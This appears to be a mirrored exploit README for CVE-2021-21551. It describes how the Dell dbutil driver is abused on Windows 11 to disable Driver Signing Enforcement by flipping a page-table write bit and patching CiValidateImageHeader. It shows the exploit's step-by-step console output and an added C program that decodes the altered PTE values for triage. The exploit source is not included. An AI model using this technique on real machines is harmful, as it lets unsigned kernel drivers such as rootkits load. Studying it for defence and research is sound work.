## https://sploitus.com/exploit?id=5FBF325A-6BF1-559B-A086-E3C0C2B72AAB
# CVE-2021-21551
Dell dbutil_2_3.sys driver Windows 11 exploit - exploiting ring0 memcpy-like functionality to disable Driver Signing Enforcement (DSE) and bypass Kernel Data Protection (KDP). No HVCI.

Tested on Windows 11 23H2.

### Disclaimer

This exploit is released in the interest of exploring the Windows kernel for self-education. I take zero responsibility for bugchecks, and for whatever you do with this. Don't be stupid.

### Usage

```text
C:\Users\me\Desktop>MSI_win11.exe
[+] ntoskrnl.exe: FFFFF80480000000
[+] Ci.dll: FFFFF804816E0000
[+] MiGetPteAddress address: FFFFF804802370C7
[+] CiValidateImageHeader address: FFFFF80481734560
[+] pteBase address = 0xFFFFA20000000000
[+] pte = 0x01000002393E7121
[+] PTE with bit flipped: 0x01000002393E7123
[+] PTE updated
[+] Read original first 4 bytes of CiValidateImageHeader: 48 89 5c 24
[+] Patched. Load your unsigned driver and then press any key to revert the changes.
<enter>
[+] Original bytes and PTE reverted
```
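For reading that log from a triage point of view, the following added example (not part of the original exploit code) decodes the two PTE values printed above using the architectural x86-64 PTE layout and reports which bit changed and whether the mapping ends up writable and executable at once. The function names are hypothetical; the two constants are copied from the output above.

```c
#include <stdint.h>
#include <stdio.h>

/* Architectural x86-64 4 KiB PTE bits (Intel SDM / AMD APM). */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_ACCESSED (1ULL << 5)
#define PTE_DIRTY    (1ULL << 6)
#define PTE_GLOBAL   (1ULL << 8)
#define PTE_NX       (1ULL << 63)
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL   /* physical frame number, bits 12..51 */

static const struct { uint64_t bit; const char *name; } pte_flags[] = {
    { PTE_PRESENT, "Present" }, { PTE_WRITE, "Writable" }, { PTE_USER, "User" },
    { PTE_ACCESSED, "Accessed" }, { PTE_DIRTY, "Dirty" }, { PTE_GLOBAL, "Global" },
    { PTE_NX, "NoExecute" },
};

/* Physical frame number the entry points at. */
uint64_t pte_pfn(uint64_t pte) { return (pte & PTE_PFN_MASK) >> 12; }

/* A present mapping that is writable and executable at once breaks W^X. */
int pte_is_wx(uint64_t pte) {
    return (pte & PTE_PRESENT) && (pte & PTE_WRITE) && !(pte & PTE_NX);
}

/* Bits that differ between two snapshots of the same PTE. */
uint64_t pte_changed_bits(uint64_t before, uint64_t after) { return before ^ after; }

/* Print the entry, its frame number and the names of the flags that are set. */
void pte_describe(const char *label, uint64_t pte) {
    printf("%s 0x%016llX pfn=0x%llX flags:", label,
           (unsigned long long)pte, (unsigned long long)pte_pfn(pte));
    for (size_t i = 0; i < sizeof pte_flags / sizeof pte_flags[0]; i++)
        if (pte & pte_flags[i].bit) printf(" %s", pte_flags[i].name);
    printf("%s\n", pte_is_wx(pte) ? "  <-- writable + executable" : "");
}

int main(void) {
    /* Values copied from the usage output above. */
    const uint64_t before = 0x01000002393E7121ULL, after = 0x01000002393E7123ULL;
    pte_describe("before", before);
    pte_describe("after ", after);
    printf("changed bits: 0x%llX\n", (unsigned long long)pte_changed_bits(before, after));
    return 0;
}
```

The only difference between the two entries is the R/W bit; the frame number is unchanged and the NX bit is clear in both, so the page goes from read-only executable to writable and executable.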

### Driver

You'll have to find the vulnerable driver yourself. It won't compile either: you'll have to add the missing structs and headers. It shouldn't be that hard, good luck. Again, don't be stupid. Use it for self-education only.

### Reference

- https://nvd.nist.gov/vuln/detail/CVE-2021-21551